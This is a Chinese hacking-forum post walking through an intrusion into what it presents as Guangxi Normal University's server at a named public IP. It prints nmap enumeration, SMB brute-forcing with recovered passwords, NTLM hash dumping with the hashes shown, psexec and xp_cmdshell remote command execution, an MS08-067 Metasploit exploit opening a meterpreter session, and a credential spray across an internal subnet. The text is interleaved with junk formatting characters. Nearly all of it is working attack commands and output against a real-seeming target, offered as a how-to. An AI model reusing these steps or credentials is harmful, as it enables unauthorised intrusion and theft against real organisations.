中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]
作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/1 |: B- i: I: E* G$ B* `

" J' K9 n8 {4 [. `root@bt:~# nmap -sS -sV 202.103.242.241
6 q# f$ r) T' w9 k! V7 r& \9 l; n( M" j5 ^9 J
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST: T6 b4 y  T4 g1 F' p
( f9 A1 P: e- x8 B
Nmap scan report for bogon (202.103.242.241); Q7 }$ h' ]$ W3 j: X

; |* A( _1 U1 n& y/ tHost is up (0.00048s latency).
' ~7 W; h; m) I4 v) a3 X; b. c* g' b7 h3 U1 f" Q
Not shown: 993 closed ports
! Q) |  i5 V4 J7 m" h; [8 l
4 C7 G2 @" I/ qPORT     STATE SERVICE       VERSION
, T1 Q) q0 }8 D, m! t9 R! u8 y
# \  W4 W8 O' L, R; l* y+ |135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)9 y: v* N. y0 h: w8 O3 O
; s& u5 a. a. p9 O% F
139/tcp  open  netbios-ssn! B6 T3 V. e3 s3 u' ^3 f* b
! M7 _7 F& G9 I7 U8 a9 f, z& W
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
) y0 v& ~$ U/ J+ B0 Y
( o% _& t+ l$ b2 k2 r9 Q4 F4 l6 M' _1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)' e* }0 J# r1 j6 P6 S) [' j% d

  ?5 z. F# n& r' j/ ?1026/tcp open  msrpc         Microsoft Windows RPC2 u% E# r1 m& h& o" R3 m

3 E  F, s. N7 `3372/tcp open  msdtc?2 f" ?  D; ^8 G) w0 ^' o9 E; R

8 s  I) m7 {1 F4 Y9 ]7 i9 _8 C3389/tcp open  ms-term-serv?
7 w" D+ I$ t( d9 K: r
4 I  c$ K* q& u1 G' X1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
, i  N9 W+ e' @* H( Q4 ASF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r/ Y; G8 |8 E1 Z3 x! d# @8 Z

, m' n  h  Z& P, j& b- ~3 tSFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions5 Y) Y# R/ N+ f/ }; B- E- W2 K

! T- d- T6 y% M# D$ D' iSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)) \6 S. I& S3 a* N( r2 L" v/ K  A

) |5 {6 b8 b: J! t7 F/ K. KSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO7 l8 ^) d. L. M9 {

- w2 G2 W+ L- r- |2 N. ?0 m/ \SF:ptions,6,”hO\n\x000Z”);
* m) E( m: M( ?, P- b
6 ]2 e5 K5 j9 c, |$ P) @/ qMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 Z$ |* w0 k7 p. ?
7 A; z% J2 T; ?6 m& Y. t  J6 v' N
Service Info: OS: Windows
1 O, j( ~- h/ ?% B, W
1 {5 \2 I7 U0 \0 O0 H8 c  x( l1 _Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
/ O( m8 `! K4 ]; U+ J  X$ B# W$ R* G% G2 s1 s! k$ c9 M
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds0 F; e% \8 b! S) D  _. T
8 s; S% e7 E! V4 `) D* k) L
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
+ o! H! l& q) k6 J$ N" O- y' }) l0 k8 v
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
8 @( }1 D7 n- c5 K/ F/ m/ e" u2 m
) t3 ?; W# P' r. b# v2 y+ P-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
& F+ K  y& _1 E' F" U4 a
! U  G" q3 Z2 \2 o  }- P* M  e-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
# n* ]( Y" V& p% D2 u. N/ i* t8 S( E9 f2 a* [$ `( b* P
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
( Y+ g7 X5 H4 t+ s4 p9 n, ^- a* e1 {
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse4 D6 @! b$ c' @  n* }% Q9 F) E
! |. X4 m8 w' e+ q( u' i  x
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse' k/ Z) i% `$ K" ]& N' ~* N  i9 r

& T8 M. X2 A6 o# M$ r  T2 W. ~9 t-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse0 @: l  e, B' _2 S" ?) b  F0 i

: j4 T/ S* x; X: {; O-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
4 M( A% W9 \* h8 l: {- _
! r" r2 {4 ~7 G0 f0 @; [-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
1 X1 w- o. H9 e" V0 u/ }
) E% K* |8 U2 ^# P9 I-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse5 c5 r, U  s7 j4 v6 l

( |6 l# k% d) Z/ P- {-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse2 A2 Y% m5 j2 P1 A% Z! V* X

2 O) V; U' e1 F8 q3 k/ ]' C-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
. B3 r( o  K* a0 L, l- f' c4 n7 o! U
: J) l8 {* ]1 ~2 \-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse7 Y2 q% R' c9 D. B! y5 @1 c

; A# V5 Z. x1 u5 ?5 H8 x-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
0 Y: r3 h$ ^6 R. h# |8 @- `( w+ s! _3 v7 ^; j; O5 t9 j/ c& G
-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse) f2 V; L: h) ?

4 Z: ]. b( A8 u; D' Eroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
/ v  r" R# z9 R7 ?$ f( y% w& ^
! `' }4 V) l- U& F& N//此乃使用脚本扫描远程机器所存在的账户名4 \. g% G" t/ r! N8 j/ Z5 p

3 O  D; W7 I3 t: @) s4 R0 UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST9 @# d' f5 H; }: s

) C, a& ~1 r6 m) U/ FNmap scan report for bogon (202.103.242.241)5 P" \( Z( v/ I5 ~4 T$ [

/ B8 L+ ~; q# S5 l* hHost is up (0.00038s latency).
: a2 H6 l* D) j! H: k% c9 t
. i. E5 L' D1 Q5 g; [( @Not shown: 993 closed ports
+ X( g8 ^" _0 w0 Y- Y. m5 {$ N6 ?" G2 N! G  A9 X4 K
PORT     STATE SERVICE! i) y8 y8 j- C. p4 E# i* [$ w% g: M3 R
3 V$ @: t% p* _
135/tcp  open  msrpc8 U4 w9 I6 P! P: q7 @
/ C/ ]$ g" P6 X0 _" ]/ W0 z
139/tcp  open  netbios-ssn5 _0 a) w: @" A; w2 E/ @

- N& e: v/ J! X: X0 r/ `445/tcp  open  microsoft-ds, x# j2 o0 z; u/ k: k; d' l- H
4 |/ U# L" a/ `! P
1025/tcp open  NFS-or-IIS" G2 U0 W" A. h/ T8 f2 F2 s
, i: A/ F6 k" ?: g$ f5 x8 Y
1026/tcp open  LSA-or-nterm
4 c) @+ E8 V. |
5 _7 u5 }9 j: J3 s: p" J3372/tcp open  msdtc
4 M5 G) d7 l" E1 g: O' k/ G2 m4 N7 R0 i& `+ n; S7 o* `
3389/tcp open  ms-term-serv- x$ L0 j! ^' I4 P. F

& {3 h1 s# a6 h7 ?0 f! ?5 gMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 E0 C" O  H# T3 H8 n' E  R3 ]0 }$ @& K
Host script results:
& O' m3 e7 @) m' r: v
3 z  `1 m% v+ G| smb-enum-users:
8 U4 F; A# Y  y1 l0 o! D/ h& o+ g
4 Q+ M% Y1 B/ P" Z3 l! z" D|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
9 Y% E4 ^2 y% m" M$ q, z- W" ?, [6 j% [
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
: v+ B0 O( b4 Y  f1 P' B4 o. _! {8 H2 B$ b
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ' d8 b# b+ J' s, A
. n/ G% |8 k/ l  c: y1 Q! |+ K5 o
//查看共享
2 ]4 |1 \1 U9 {4 Y+ i$ I$ a  ?" l7 h- r$ v' r2 y& j' l/ D  G
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST. Z1 C, u: l: ~( k+ J
" h# o2 A) c* C$ z/ E$ A3 V6 }
Nmap scan report for bogon (202.103.242.241)) k, C( i2 F" \/ e. i
# Y) i# f2 f' X1 W7 F: X8 u
Host is up (0.00035s latency).
1 r5 W0 ~; O1 M6 g& K/ z; g
7 ^, Q. k* y% d' F% ]1 j8 B- ^8 P3 uNot shown: 993 closed ports
, l3 \8 b% \+ X: F6 L( D2 e1 c+ i  _' o
PORT     STATE SERVICE  r! J1 h* I8 B/ M8 T7 H6 R

9 f1 u- d3 c; |: l5 y) f135/tcp  open  msrpc% ~  R7 y: q3 a- X& ]
# q0 h: D* e  m) p4 \
139/tcp  open  netbios-ssn' f6 b' Z+ }* U! [- |" \( J

5 m( C1 i! U; A/ v/ X445/tcp  open  microsoft-ds
" Q; T* h1 E/ u4 L2 B7 e' P8 v  w$ {- o' O+ B
1025/tcp open  NFS-or-IIS" f" G+ ~/ e' a! z4 z# ^

% f* W& n- B) O1026/tcp open  LSA-or-nterm
$ G# Y/ |5 _; z+ j2 \$ N3 B5 z5 d7 C6 I/ [9 O
3372/tcp open  msdtc# S" |. Z1 g0 }4 C+ P7 `1 ]
, f( a+ F4 w, _) O% G$ G
3389/tcp open  ms-term-serv
" `# _9 Q  F- e7 j2 k( B8 z3 v0 c6 _: a5 |7 U( B+ }* `
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 J  a6 J$ h5 t
# ], _: T* O2 U! S8 T7 G
Host script results:0 N7 \! y7 y0 D* f- B7 @

5 R, [; X) d" M| smb-enum-shares:
  q3 p8 f, Q$ @) y  Z& w6 O; Y7 `3 \& ?, n) J
|   ADMIN$6 G* [) p6 z8 U

. ]+ @3 V* m1 `0 p2 W|     Anonymous access: <none>
6 b) z; l' K4 K, ]4 n/ ?
+ G* d1 k+ }- t6 b7 X& K|   C$* Y; m2 j" T) t9 N8 x% `
+ L4 F! h* ~) K- c% _
|     Anonymous access: <none>
) E0 f  n9 K2 [0 a" j# ]% M
; I9 U( B( t  I9 _|   IPC$
6 d/ [5 A; n" k* p9 I/ i1 H& L- A) f. }
|_    Anonymous access: READ) q6 s4 ]( l$ M; N# {! r

4 r- j# y2 L& |  P7 PNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
8 X) d/ B! B$ g& r. p! k3 J* r- d/ ~5 j* {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       $ o9 ]9 W, Q1 h' f

& l9 \% J+ J1 Q# R; X" }/ ^# ?//获取用户密码4 N! s: Z. P- O3 S3 x( g5 h

( O* G2 F# s: T7 P* |Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
) f- R4 H. d# ?" X1 d3 H% k/ g. @+ k' `
Nmap scan report for bogon (202.103.242.2418)& M7 U* u8 K$ w; A# ]2 Y
6 W- z* b: ?' ^  i
Host is up (0.00041s latency).9 v! s5 L1 V# L

* b: }$ i! c# }& m/ L5 j& a' JNot shown: 993 closed ports
1 O5 W  ^* m* O
' v2 p: A5 q( M' t6 c1 iPORT     STATE SERVICE6 m& z2 M2 H1 E1 S
2 k$ n* M3 Z  \) s
135/tcp  open  msrpc
7 j! S  q2 M$ I7 L. z% F; s: q( T1 f4 @8 o
139/tcp  open  netbios-ssn) L) P& s/ ?1 x5 J

2 a! g' ]. r% O* P445/tcp  open  microsoft-ds; @3 D, o6 i9 \( J( Q8 B8 |
3 j; |& F) [; U4 z
1025/tcp open  NFS-or-IIS
% c; H7 u: y6 e1 t8 E) t( X; q! V. |/ r* l+ X# o; R6 p* m2 m" u
1026/tcp open  LSA-or-nterm
$ `6 F4 X/ L# o% P/ D
/ I( l, p; c' e# K& {0 R/ \3372/tcp open  msdtc
. W# a4 H' H, M9 K' a% q8 w  i4 J4 ]0 D# W
3389/tcp open  ms-term-serv
9 [7 I! l( s- s4 a. O' h
9 v" ?- `& ?+ J5 r3 h. ?6 O4 EMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
9 U5 ~) p$ Y) E! w" H' ~  k1 I# @' K- F
Host script results:% b4 q# G8 V7 e7 w: M3 y

) [; G; r# B! g6 y/ a| smb-brute:
! H7 R( @" H6 J
( F+ D/ ^& ^7 E/ k) }6 `1 A2 Qadministrator:<blank> => Login was successful8 g/ f/ i2 S) z+ c! a" a, O

+ d" O9 X5 v( A: v& y# J|_  test:123456 => Login was successful* a/ E2 v& C+ ]7 L

, H& A% B% ~% m7 X3 ?" g1 \Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
, w  s) [( P  `4 {/ I* M, H- C+ q, u
% Z( B& e6 W/ t* s; B8 ^  w" B# ^root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
+ z0 v, k4 C* [. X2 b! R5 S; S+ e( p. ~& T: u7 {$ g( C* j
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data$ N( A% z  {1 N* }

; U' D5 c- d* ~root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
9 ~6 E/ Q/ |/ C, o9 v1 b: U5 A+ e, [
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
% g7 K; d3 C. e' b
: o. r9 V4 o0 oStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
/ ^1 z: v8 n. a  v3 J4 g2 w( A
4 Q5 k- ^( c: ^" S7 G* g3 d0 xNmap scan report for bogon (202.103.242.241)
! B7 l# R1 Z0 H2 E( c" |& l: C/ F- y/ R0 {5 Q
Host is up (0.0012s latency).! z9 Q$ J& c% P3 `

2 n3 z  O& I  f7 GPORT    STATE SERVICE$ S$ W# C) C5 S- K
% P4 T+ A8 h' u, a2 g9 a
135/tcp open  msrpc
+ z* E: T% G; a5 W
! {3 m( K/ s4 F8 h+ g139/tcp open  netbios-ssn
3 \; _6 l, K" f: P$ ^& r2 k$ i. m# j3 E  W* |3 i; A/ p! y9 y
445/tcp open  microsoft-ds
9 n8 F/ h7 Q9 L9 q+ @' N' K* I$ f7 R$ P2 E
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 x* Q+ Q7 G; k: P9 {. t
! ?. P1 P4 O, H" O6 E
Host script results:
, \- B' {' F7 i
- @7 I3 u% G( [# I* c/ W| smb-pwdump:. R9 v* W( F( X& H
' ?( g6 V5 E3 w
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
; S( x+ \4 e* z% g& j$ \9 r& G' Z' M
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
# r( e( ?0 n$ q$ t1 i- z% y/ K- a6 n0 @, S+ E
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4( a  }) {) f  z* Q* `8 D9 v1 A
& m: @% v9 @2 E. ~0 K8 U7 p2 M
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
! X( E" U  l; ?9 s- ^4 W  f+ y, M& S. |3 c4 Z
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds+ ]1 I  h/ @8 r$ E, Q

* p, Z8 i! l% w, u/ Y5 j# o" lC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
1 f- R9 v3 W5 @' o4 [9 y9 O: d, s3 f  c) T
-p 123456 -e cmd.exe
0 L) w$ c$ s$ o+ d% K% b
' g, G: }3 f6 {7 ^' GPsExec v1.55 – Execute processes remotely
. J' I5 {. F' i5 N* n3 e
7 A# _0 a: `" B8 e$ H! jCopyright (C) 2001-2004 Mark Russinovich* d: }4 l/ Y2 b: i+ I5 V8 a" Q3 G$ `
9 ]! W! l4 Y$ U0 K1 [- ^9 N' G
Sysinternals – www.sysinternals.com
  u( @) a; ^/ g( z; S! v' [% R5 Q- T$ |7 C9 i7 D
Microsoft Windows 2000 [Version 5.00.2195]! K! A1 X* |% \# ~( q
5 u! P" ]% Y9 s% Y2 |
(C) 版权所有 1985-2000 Microsoft Corp.
% o! b! D( H, T/ k
1 k7 D" z! Q/ ~7 y( b, Z- @3 cC:\WINNT\system32>ipconfig
2 G( J1 H9 F7 |2 A$ U/ {: x0 ~0 _" N0 l
Windows 2000 IP Configuration( a8 z* B9 Z% t1 }- W
' u2 u' u! t( h0 j# c2 q
Ethernet adapter 本地连接:
; @# C; q: e$ T$ [0 T( s
( o2 p& S& a  h% F" }Connection-specific DNS Suffix  . :% L$ v( q: L  ]9 X4 u( D
7 ]( R! ?9 v# f3 i# R2 \* I
IP Address. . . . . . . . . . . . : 202.103.242.241
; w) e& K7 ~2 U  ~9 m/ s6 R9 W( Y% H) H' Q7 k
Subnet Mask . . . . . . . . . . . : 255.255.255.0" n* Z. H; _* w) j
5 k* F& f1 w: F! q! f) s
Default Gateway . . . . . . . . . : 202.103.1.1. Y! ?# ~  I# _0 z' I

+ `7 _4 ?% t" c( yC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
' P. ]* g" i- T( R; C# K; O: Z; r
$ W4 i6 j5 x$ `$ I/ [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞
' T' _& I) ^* y) n* @1 J  T. f+ I$ S3 T9 D8 T4 g8 n+ X
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
  @' x. M! y8 a; G$ C$ \: L' \9 D6 {; N6 r
Nmap scan report for bogon (202.103.242.241)
# ]0 ~+ w, q0 J% T' j( p( R7 H4 W( Q2 L! o$ f0 P
Host is up (0.00046s latency).
- K$ _& b$ {# q% r# K! O9 ]* l0 |; b+ r) `0 H
Not shown: 993 closed ports
7 J4 w) B+ `  J1 H0 M* m4 @6 g) N; l% W* h  v& |+ K; q
PORT     STATE SERVICE
% T0 r  y) Z: X& G
9 q* q2 m6 r4 B1 g; r+ o135/tcp  open  msrpc/ h* Z6 s' V4 A9 B/ f$ D

: v' N7 u9 X# K- r1 A! i139/tcp  open  netbios-ssn+ R4 o. `! t+ O  i. B0 `

  B$ f4 P* t5 i! Y445/tcp  open  microsoft-ds
- f. y/ g5 w( X" B$ R; H* f! H3 N: T! @6 P: Y3 w2 ?" @
1025/tcp open  NFS-or-IIS
- c; O* @. O$ v- ]" Q5 g2 x# ~3 j9 T/ e  t: g; |
1026/tcp open  LSA-or-nterm, t5 O& }  h' Z2 a) }) H

) {9 @9 y) K# d, U3372/tcp open  msdtc# {% ^) X$ e& Z1 n* O
5 X* E* p2 A( @- s
3389/tcp open  ms-term-serv% B; i7 w. ^2 _3 \* R+ W' P+ G
, D: |- |) q. m9 L9 u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)) G3 D& t" m* _1 Y$ u
6 e( o( x  m( y
Host script results:8 g! b1 ^7 s- i7 v" [

& i# \% o( V3 e# L" W) F| smb-check-vulns:
5 F2 ]% a/ F/ i4 A6 D% Z% d% a- o2 I5 \# s' b, m+ P) N8 G
|_  MS08-067: VULNERABLE9 Y( a8 o; E2 _8 e
) R7 ~# l3 E9 _
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds0 i% Z# }' @! v$ V- l' d) S; [
6 ?+ Z8 c) x8 E. w' y8 `
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出; o. @' q: F& v5 L

6 o2 |$ O$ b* J- Rmsf > search ms08& w/ D% s7 }; k

& Z  J9 ^/ ]5 J, h8 \msf > use exploit/windows/smb/ms08_067_netapi6 i. l+ g2 t" C! e4 m
, i3 g0 t8 c; \
msf  exploit(ms08_067_netapi) > show options
8 K. G7 ~# I" S/ r3 @7 I# v9 }; H& s& Z
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.2418 M' n) d6 l* k

( Z: L5 x. m+ U+ z1 C( y& y5 Mmsf  exploit(ms08_067_netapi) > show payloads
& @* z: S# Q5 [0 k; ^/ B) z2 s, j# T$ x, w( c
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
/ e# ~4 K: G% h  w; q1 x% v
0 V; |; t# S! g) Nmsf  exploit(ms08_067_netapi) > exploit( `' }6 Y2 J  r/ I) `" z" Q/ u
  C+ B6 h0 _* H! n' l! P
meterpreter >) S2 U0 D  }0 p9 ?- H- I' k

- N! f3 }7 q/ [. w+ _% PBackground session 2? [y/N]  (ctrl+z)
+ g9 X" u  d2 `, k2 Q- ^" F& L" p2 t
msf  exploit(ms08_067_netapi) > sessions -l
3 F, @4 c5 x( w) ~5 K# `, I; m2 a* e3 r5 ?% c# F
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
7 J. a9 Q' j' {8 G8 B8 Z0 Q* D+ q: o7 m) ]# i0 @+ A4 Y& |; h# I) D# x9 d
test
  l- T: f' B. U7 x
" G! ^% r  D. ^8 E* S0 Madministrator8 ~/ N/ V$ {& m  ~& ~3 V# N
; a7 H& H, ^6 {# {: O
root@bt:/usr/local/share/nmap/scripts# vim password.txt
' a$ v0 D; w2 n6 f# o5 k1 s: n1 O' S
44EFCE164AB921CAAAD3B435B51404EE
! l  K& W' y( b8 ]' L! c8 r
3 d: C9 J. U( F) \* B& qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 " o4 z$ f( O$ u5 O

% b& R$ N* X1 B. a //利用用户名跟获取的hash尝试对整段内网进行登录
1 r* D2 J  r# P7 c+ G; U- Q# S% o/ ~
1 v, J# D' b2 E6 I4 ~7 @/ q5 k8 pNmap scan report for 192.168.1.105
/ b# J7 j$ H% |- A; D$ X; h8 v1 S3 d
Host is up (0.00088s latency).0 o: l9 o' l  X1 }8 m

9 P" k: E/ z, {* g7 m0 v0 v2 jNot shown: 993 closed ports6 V: }0 \6 \/ l
; u5 M- \0 C9 t" U( k+ l
PORT     STATE SERVICE
1 q; _. R9 @- w1 n4 @$ w
- l6 X+ M) e7 R- G135/tcp  open  msrpc+ |. E8 o9 r8 B' Q) j

) ~. b, M3 a- O0 y( u' e8 q139/tcp  open  netbios-ssn
- S& l. `! q$ a7 m, ?0 `% T
8 w% R' r1 [/ z  N1 {6 z445/tcp  open  microsoft-ds1 E. ]3 Q! T" s" }" [6 Y' k1 y
4 V: H% H" i; ]' x
1025/tcp open  NFS-or-IIS, V# C; L: I0 X) d/ `# o, F) L

( A& f) [) E+ ]0 A5 z0 T1026/tcp open  LSA-or-nterm
5 a- q7 t/ h6 A4 k, A) n. X0 }) B( _% l! J8 ^
3372/tcp open  msdtc; |4 c9 \! b% L5 r8 B) R: T9 [
' U# w0 }( x6 H2 S. V( h2 b; g2 ^
3389/tcp open  ms-term-serv
$ A# d8 V; m- [7 C8 A- U1 r9 w' ^  |6 W1 v5 \7 C8 b
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& ?! D5 \, M0 W9 e, @
- l6 q3 ~2 F5 ~( z; Q
Host script results:
0 C- `; [$ M5 O9 y, N! R
1 i; y7 q" d5 A5 c8 [$ `* v| smb-brute:1 c( J9 J; ~4 O8 K5 Z" s

- D' B4 B) \1 d( M|_  administrator:<blank> => Login was successful) m) _5 d% ~6 J. V- R3 k; T  t7 J
9 v- e, o; B3 R
攻击成功,一个简单的msf+nmap攻击~~·; {* f9 v: K8 \% w- V
2 ^; P4 X! ~" C# I* V% N3 b* {




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2